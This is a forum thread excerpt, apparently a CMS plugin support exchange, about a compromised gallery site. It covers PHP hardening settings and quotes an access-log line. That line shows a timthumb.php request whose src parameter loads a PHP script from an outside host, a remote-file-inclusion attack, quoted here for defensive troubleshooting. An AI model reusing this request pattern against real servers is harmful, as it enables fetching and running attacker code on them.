2012-04-01, 02:05:17
devaintfire Wrote:The php.ini directives are...URL include should definitely by off by default. You should never need it.
allow_url_include = "0"
allow_url_fopen = "0"
------------------------------
Switching URL fopen off will disable GetSimple version/plugin update check, etc.
devaintfire Wrote:They seem pretty sure it's down to the gallery, I gave em hell last night, but if it is a problem with the gallery surely it should be sorted?
You site IS a gallery (with a contact form). So are you sure they really meant the I18N Gallery plugin or rather the site as a whole? In either case I do not see anything that could indicate something wrong with my plugin?
devaintfire Wrote:All of the following hits returned successful results on a script called timthumb.php
rcosstickphoto.com-access_log.2.gz:rcosstickphoto.com 72.10.55.173 - - [21/Mar/2012:08:55:49 +0000] "GET /xo/ix-xyz-graph-paper//wp-content/themes/modularity/includes/timthumb.php?src=http://blogger.com.chicolisto.com/cok.php HTTP/1.1" 200 4840 "-" "gsa-crawler (Enterprise; GID-01422; jplastiras.com)"
If I understand this log entry correctly it accesses the timthumb.php on your server. wp-content seems to indicate that you have Wordpress installed?